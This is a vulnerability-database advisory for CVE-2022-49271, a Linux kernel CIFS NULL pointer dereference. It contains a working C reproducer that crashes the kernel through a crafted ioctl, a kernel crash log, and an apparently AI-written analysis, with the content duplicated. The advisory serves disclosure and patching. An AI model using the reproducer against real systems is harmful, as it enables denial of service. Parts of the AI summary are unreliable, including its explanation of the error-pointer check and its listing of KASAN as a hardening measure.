CVE-2022-49271: Vulnerability in Linux Linux
In the Linux kernel, the following vulnerability has been resolved: cifs: prevent bad output lengths in smb2_ioctl_query_info() When calling smb2_ioctl_query_info() with smb_query_info::flags=PASSTHRU_FSCTL and smb_query_info::output_buffer_length=0, the following would return 0x10 buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length); if (IS_ERR(buffer)) { kfree(vars); return PTR_ERR(buffer); } rather than a valid pointer thus making IS_ERR() check fail. This would then cause a NULL ptr deference in @buffer when accessing it later in smb2_ioctl_query_ioctl(). While at it, prevent having a @buffer smaller than 8 bytes to correctly handle SMB2_SET_INFO FileEndOfFileInformation requests when smb_query_info::flags=PASSTHRU_SET_INFO. Here is a small C reproducer which triggers a NULL ptr in @buffer when passing an invalid smb_query_info::flags #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #define die(s) perror(s), exit(1) #define QUERY_INFO 0xc018cf07 int main(int argc, char *argv[]) { int fd; if (argc < 2) exit(1); fd = open(argv[1], O_RDONLY); if (fd == -1) die("open"); if (ioctl(fd, QUERY_INFO, (uint32_t[]) { 0, 0, 0, 4, 0, 0}) == -1) die("ioctl"); close(fd); return 0; } mount.cifs //srv/share /mnt -o ... gcc repro.c && ./a.out /mnt/f0 [ 114.138620] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI [ 114.139310] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] [ 114.139775] CPU: 2 PID: 995 Comm: a.out Not tainted 5.17.0-rc8 #1 [ 114.140148] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-0-g2dd4b9b-rebuilt.opensuse.org 04/01/2014 [ 114.140818] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs] [ 114.141221] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24 [ 114.142348] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256 [ 114.142692] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d [ 114.143119] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380 [ 114.143544] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003 [ 114.143983] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288 [ 114.144424] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000 [ 114.144852] FS: 00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000 [ 114.145338] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 114.145692] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0 [ 114.146131] Call Trace: [ 114.146291] <TASK> [ 114.146432] ? smb2_query_reparse_tag+0x890/0x890 [cifs] [ 114.146800] ? cifs_mapchar+0x460/0x460 [cifs] [ 114.147121] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.147412] ? cifs_strndup_to_utf16+0x15b/0x250 [cifs] [ 114.147775] ? dentry_path_raw+0xa6/0xf0 [ 114.148024] ? cifs_convert_path_to_utf16+0x198/0x220 [cifs] [ 114.148413] ? smb2_check_message+0x1080/0x1080 [cifs] [ 114.148766] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.149065] cifs_ioctl+0x1577/0x3320 [cifs] [ 114.149371] ? lock_downgrade+0x6f0/0x6f0 [ 114.149631] ? cifs_readdir+0x2e60/0x2e60 [cifs] [ 114.149956] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.150250] ? __rseq_handle_notify_resume+0x80b/0xbe0 [ 114.150562] ? __up_read+0x192/0x710 [ 114.150791] ? __ia32_sys_rseq+0xf0/0xf0 [ 114.151025] ? __x64_sys_openat+0x11f/0x1d0 [ 114.151296] __x64_sys_ioctl+0x127/0x190 [ 114.151549] do_syscall_64+0x3b/0x90 [ 114.151768] entry_SYSCALL_64_after_hwframe+0x44/0xae [ 114.152079] RIP: 0033:0x7f7aead043df [ 114.152306] Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 ---truncated---
AI Analysis
Technical Summary
CVE-2022-49271 is a vulnerability identified in the Linux kernel's CIFS (Common Internet File System) client implementation, specifically within the smb2_ioctl_query_info() function. The flaw arises when the function is called with smb_query_info::flags set to PASSTHRU_FSCTL and smb_query_info::output_buffer_length set to zero. Under these conditions, the function attempts to duplicate a user-space buffer of zero length using memdup_user(), which returns an error pointer rather than a valid pointer. However, the subsequent IS_ERR() check fails to detect this error, leading to a NULL pointer dereference when the code later accesses the buffer. This results in a kernel crash (general protection fault) due to dereferencing a NULL pointer. Additionally, the vulnerability includes improper handling of buffers smaller than 8 bytes when processing SMB2_SET_INFO FileEndOfFileInformation requests with the PASSTHRU_SET_INFO flag, which could also lead to instability or memory corruption. The vulnerability can be triggered by issuing a crafted ioctl call (QUERY_INFO) on a mounted CIFS share, as demonstrated by the provided C reproducer code. The kernel logs show a general protection fault and a KASAN (Kernel Address Sanitizer) null pointer dereference, confirming the impact. This vulnerability affects Linux kernel versions containing the vulnerable CIFS code and can be exploited locally by users with access to a CIFS-mounted filesystem. The flaw does not require elevated privileges beyond the ability to perform ioctl calls on CIFS mounts, but it can cause denial of service by crashing the kernel. No known exploits are reported in the wild, and no CVSS score has been assigned yet. The issue has been resolved in recent kernel updates by adding proper checks to prevent invalid buffer lengths and ensure error pointers are correctly handled.
Potential Impact
For European organizations, this vulnerability poses a risk primarily to systems running Linux kernels with vulnerable CIFS client implementations, especially those that mount SMB/CIFS shares from Windows or Samba servers. The impact is mainly denial of service (DoS) through kernel crashes triggered by malformed ioctl calls. This can disrupt critical file sharing services, affecting business continuity, especially in environments relying on CIFS for network storage or cross-platform file access. Organizations using Linux-based servers, workstations, or embedded devices that access SMB shares are at risk. While the vulnerability does not appear to allow privilege escalation or remote code execution, the resulting kernel panic can lead to system downtime and potential data loss if unsaved data is present. In multi-tenant or virtualized environments, a single compromised or malicious user with access to CIFS mounts could disrupt the host system or other tenants. Given the widespread use of Linux in European enterprises, cloud providers, and public sector infrastructure, the vulnerability could have significant operational impact if exploited. However, exploitation requires local access and the ability to perform ioctl calls on CIFS mounts, limiting the attack surface to authenticated or internal users. The absence of known exploits in the wild reduces immediate risk but does not eliminate the need for prompt remediation.
Mitigation Recommendations
European organizations should prioritize updating Linux kernels to versions where this vulnerability is patched. Kernel updates from trusted distributions (e.g., Debian, Ubuntu, Red Hat, SUSE) should be applied promptly. As a temporary mitigation, restrict access to CIFS mounts and limit ioctl operations to trusted users only. Implement strict access controls and monitoring on systems exposing CIFS shares to prevent unauthorized local access. Employ kernel hardening features such as Kernel Address Sanitizer (KASAN) and kernel lockdown where feasible to detect and mitigate memory errors. Network segmentation can reduce exposure by isolating CIFS clients from untrusted networks. Additionally, auditing and monitoring kernel logs for signs of crashes or suspicious ioctl calls can help detect attempted exploitation. For environments using CIFS heavily, consider alternative file sharing protocols or hardened SMB clients until patches are applied. Finally, ensure backups and disaster recovery plans are in place to minimize impact from potential DoS incidents caused by kernel crashes.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Poland, Italy, Spain
CVE-2022-49271: Vulnerability in Linux Linux
Description
In the Linux kernel, the following vulnerability has been resolved: cifs: prevent bad output lengths in smb2_ioctl_query_info() When calling smb2_ioctl_query_info() with smb_query_info::flags=PASSTHRU_FSCTL and smb_query_info::output_buffer_length=0, the following would return 0x10 buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length); if (IS_ERR(buffer)) { kfree(vars); return PTR_ERR(buffer); } rather than a valid pointer thus making IS_ERR() check fail. This would then cause a NULL ptr deference in @buffer when accessing it later in smb2_ioctl_query_ioctl(). While at it, prevent having a @buffer smaller than 8 bytes to correctly handle SMB2_SET_INFO FileEndOfFileInformation requests when smb_query_info::flags=PASSTHRU_SET_INFO. Here is a small C reproducer which triggers a NULL ptr in @buffer when passing an invalid smb_query_info::flags #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #define die(s) perror(s), exit(1) #define QUERY_INFO 0xc018cf07 int main(int argc, char *argv[]) { int fd; if (argc < 2) exit(1); fd = open(argv[1], O_RDONLY); if (fd == -1) die("open"); if (ioctl(fd, QUERY_INFO, (uint32_t[]) { 0, 0, 0, 4, 0, 0}) == -1) die("ioctl"); close(fd); return 0; } mount.cifs //srv/share /mnt -o ... gcc repro.c && ./a.out /mnt/f0 [ 114.138620] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI [ 114.139310] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] [ 114.139775] CPU: 2 PID: 995 Comm: a.out Not tainted 5.17.0-rc8 #1 [ 114.140148] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-0-g2dd4b9b-rebuilt.opensuse.org 04/01/2014 [ 114.140818] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs] [ 114.141221] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24 [ 114.142348] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256 [ 114.142692] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d [ 114.143119] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380 [ 114.143544] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003 [ 114.143983] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288 [ 114.144424] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000 [ 114.144852] FS: 00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000 [ 114.145338] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 114.145692] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0 [ 114.146131] Call Trace: [ 114.146291] <TASK> [ 114.146432] ? smb2_query_reparse_tag+0x890/0x890 [cifs] [ 114.146800] ? cifs_mapchar+0x460/0x460 [cifs] [ 114.147121] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.147412] ? cifs_strndup_to_utf16+0x15b/0x250 [cifs] [ 114.147775] ? dentry_path_raw+0xa6/0xf0 [ 114.148024] ? cifs_convert_path_to_utf16+0x198/0x220 [cifs] [ 114.148413] ? smb2_check_message+0x1080/0x1080 [cifs] [ 114.148766] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.149065] cifs_ioctl+0x1577/0x3320 [cifs] [ 114.149371] ? lock_downgrade+0x6f0/0x6f0 [ 114.149631] ? cifs_readdir+0x2e60/0x2e60 [cifs] [ 114.149956] ? rcu_read_lock_sched_held+0x3f/0x70 [ 114.150250] ? __rseq_handle_notify_resume+0x80b/0xbe0 [ 114.150562] ? __up_read+0x192/0x710 [ 114.150791] ? __ia32_sys_rseq+0xf0/0xf0 [ 114.151025] ? __x64_sys_openat+0x11f/0x1d0 [ 114.151296] __x64_sys_ioctl+0x127/0x190 [ 114.151549] do_syscall_64+0x3b/0x90 [ 114.151768] entry_SYSCALL_64_after_hwframe+0x44/0xae [ 114.152079] RIP: 0033:0x7f7aead043df [ 114.152306] Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 ---truncated---
AI-Powered Analysis
Technical Analysis
CVE-2022-49271 is a vulnerability identified in the Linux kernel's CIFS (Common Internet File System) client implementation, specifically within the smb2_ioctl_query_info() function. The flaw arises when the function is called with smb_query_info::flags set to PASSTHRU_FSCTL and smb_query_info::output_buffer_length set to zero. Under these conditions, the function attempts to duplicate a user-space buffer of zero length using memdup_user(), which returns an error pointer rather than a valid pointer. However, the subsequent IS_ERR() check fails to detect this error, leading to a NULL pointer dereference when the code later accesses the buffer. This results in a kernel crash (general protection fault) due to dereferencing a NULL pointer. Additionally, the vulnerability includes improper handling of buffers smaller than 8 bytes when processing SMB2_SET_INFO FileEndOfFileInformation requests with the PASSTHRU_SET_INFO flag, which could also lead to instability or memory corruption. The vulnerability can be triggered by issuing a crafted ioctl call (QUERY_INFO) on a mounted CIFS share, as demonstrated by the provided C reproducer code. The kernel logs show a general protection fault and a KASAN (Kernel Address Sanitizer) null pointer dereference, confirming the impact. This vulnerability affects Linux kernel versions containing the vulnerable CIFS code and can be exploited locally by users with access to a CIFS-mounted filesystem. The flaw does not require elevated privileges beyond the ability to perform ioctl calls on CIFS mounts, but it can cause denial of service by crashing the kernel. No known exploits are reported in the wild, and no CVSS score has been assigned yet. The issue has been resolved in recent kernel updates by adding proper checks to prevent invalid buffer lengths and ensure error pointers are correctly handled.
Potential Impact
For European organizations, this vulnerability poses a risk primarily to systems running Linux kernels with vulnerable CIFS client implementations, especially those that mount SMB/CIFS shares from Windows or Samba servers. The impact is mainly denial of service (DoS) through kernel crashes triggered by malformed ioctl calls. This can disrupt critical file sharing services, affecting business continuity, especially in environments relying on CIFS for network storage or cross-platform file access. Organizations using Linux-based servers, workstations, or embedded devices that access SMB shares are at risk. While the vulnerability does not appear to allow privilege escalation or remote code execution, the resulting kernel panic can lead to system downtime and potential data loss if unsaved data is present. In multi-tenant or virtualized environments, a single compromised or malicious user with access to CIFS mounts could disrupt the host system or other tenants. Given the widespread use of Linux in European enterprises, cloud providers, and public sector infrastructure, the vulnerability could have significant operational impact if exploited. However, exploitation requires local access and the ability to perform ioctl calls on CIFS mounts, limiting the attack surface to authenticated or internal users. The absence of known exploits in the wild reduces immediate risk but does not eliminate the need for prompt remediation.
Mitigation Recommendations
European organizations should prioritize updating Linux kernels to versions where this vulnerability is patched. Kernel updates from trusted distributions (e.g., Debian, Ubuntu, Red Hat, SUSE) should be applied promptly. As a temporary mitigation, restrict access to CIFS mounts and limit ioctl operations to trusted users only. Implement strict access controls and monitoring on systems exposing CIFS shares to prevent unauthorized local access. Employ kernel hardening features such as Kernel Address Sanitizer (KASAN) and kernel lockdown where feasible to detect and mitigate memory errors. Network segmentation can reduce exposure by isolating CIFS clients from untrusted networks. Additionally, auditing and monitoring kernel logs for signs of crashes or suspicious ioctl calls can help detect attempted exploitation. For environments using CIFS heavily, consider alternative file sharing protocols or hardened SMB clients until patches are applied. Finally, ensure backups and disaster recovery plans are in place to minimize impact from potential DoS incidents caused by kernel crashes.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- Linux
- Date Reserved
- 2025-02-26T01:49:39.297Z
- Cisa Enriched
- false
- Cvss Version
- null
- State
- PUBLISHED
Threat ID: 682d982dc4522896dcbe54d8
Added to database: 5/21/2025, 9:09:01 AM
Last enriched: 6/30/2025, 5:10:28 AM
Last updated: 8/6/2025, 10:11:35 PM
Views: 13
Related Threats
CVE-2025-9088: Stack-based Buffer Overflow in Tenda AC20
HighCVE-2025-9087: Stack-based Buffer Overflow in Tenda AC20
HighTop Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighCVE-2025-8878: CWE-94 Improper Control of Generation of Code ('Code Injection') in properfraction Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress
MediumCVE-2025-8143: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pencidesign Soledad
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.